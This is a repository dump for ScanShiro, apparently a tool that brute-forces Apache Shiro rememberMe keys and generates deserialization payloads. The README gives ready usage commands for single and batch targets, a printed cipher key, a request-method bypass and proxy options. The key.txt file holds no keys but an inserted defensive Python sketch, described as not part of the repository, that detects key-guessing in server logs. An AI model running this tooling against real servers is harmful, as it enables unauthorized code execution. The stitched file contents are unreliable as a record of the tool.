├── README.md
└── key.txt


/README.md:
--------------------------------------------------------------------------------
# ScanShiro

> A refactor of the ShiroScan I wrote last year

## Update
1. Scan decision logic: the result is judged by the number of rememberMe values in the response.

2. Added a bypass feature that can send random request methods.


## Learning

[How it works](http://www.lmxspace.com/2020/08/24/%E4%B8%80%E7%A7%8D%E5%8F%A6%E7%B1%BB%E7%9A%84shiro%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F/)

```text
<1.2.4 shiro550
<1.4.2 shiro721 https://cloud.tencent.com/developer/article/1944738 requires a successful login (not added yet)
>1.4.2 encryption method changed: aes gcm
```

## Usage

```shell
# Brute-force the key
java -jar ScanShiro.jar -u http://0.0.0.0 -k key.txt

# Brute-force the key for a batch of URLs
java -jar ScanShiro.jar -f url.txt -k key.txt

# Generate a payload from a known-correct key; suited to cases where you have the key but no gadgets
java -jar ScanShiro.jar -p payload.ser -c kPH+bIxk5D2deZiIxcaaaA==

# -n changes the name of the Shiro cookie, which a few environments customize; the default is rememberMe

# -proxy sets a proxy; currently only SOCKS5 proxies without a username and password are supported

# Supports -bypass 1
# (the request method used to send the data)
```

**Note: by default the regular mode runs first; if it does not find a key, AES/GCM mode runs automatically, and payload generation produces payloads for both modes. That said, the tool will definitely produce false positives!!!**


## Issues

1. In a few environments the Shiro rememberMe parameter is located in the POST request; waiting to be resolved.
2. After extensive testing, batch runs were found to hit connection errors with small probability, so to keep the tool accurate it is recommended to test connectivity to the target beforehand.

--------------------------------------------------------------------------------
/key.txt:
--------------------------------------------------------------------------------
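The README's Update notes say the scan is judged by the number of rememberMe values in the response and that bypass mode sends random request methods. The following detection sketch for the defending side is an added example, not part of the ScanShiro repository: it flags clients that cycle through many rememberMe cookies which the server rejects with `Set-Cookie: rememberMe=deleteMe`. The log format, field order, thresholds and sample lines are assumptions constructed for illustration.

```python
import hashlib
from collections import defaultdict

STANDARD_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH"}

def cookie_tag(value):
    """Log a short hash of the cookie instead of the cookie itself."""
    return hashlib.sha256(value.encode()).hexdigest()[:12]

# Constructed sample, one request per line (hypothetical proxy log format):
# <epoch> <client> <method> <rememberMe tag or -> <rememberMe=deleteMe count in response>
SAMPLE_LOG = "\n".join(
    [f"{1700000000 + i} 203.0.113.7 {'GET' if i % 3 else 'XKQZ'} {cookie_tag(f'guess{i}')} 1"
     for i in range(12)]
    + [f"1700000013 203.0.113.7 GET {cookie_tag('last-guess')} 0",
       f"1700000020 198.51.100.4 GET {cookie_tag('real-user')} 0",
       f"1700000900 198.51.100.4 GET {cookie_tag('real-user')} 0"]
)

def detect_key_guessing(log_text, window=60, min_cookies=10):
    """Return {client: finding} for clients cycling through rejected rememberMe cookies."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        ts, client, method, tag, deleted = line.split()
        if tag != "-":  # only requests that carried the cookie matter here
            events[client].append((int(ts), method, tag, int(deleted)))
    findings = {}
    for client, evs in events.items():
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):  # sliding window over this client's requests
            while evs[end][0] - evs[start][0] > window:
                start += 1
            rejected = {t for _, _, t, d in evs[start:end + 1] if d > 0}
            best = max(best, len(rejected))
        if best < min_cookies:
            continue
        first_reject = min(ts for ts, _, _, d in evs if d > 0)
        findings[client] = {
            "distinct_rejected_cookies": best,
            "odd_methods": sorted({m for _, m, _, _ in evs if m not in STANDARD_METHODS}),
            # An accepted cookie after a run of rejections: treat the key as exposed.
            "accepted_after_rejects": [t for ts, _, t, d in evs if d == 0 and ts > first_reject],
        }
    return findings

if __name__ == "__main__":
    print(detect_key_guessing(SAMPLE_LOG))
```

A non-empty `accepted_after_rejects` list is the signal to rotate the application's rememberMe cipher key and review the requests that followed.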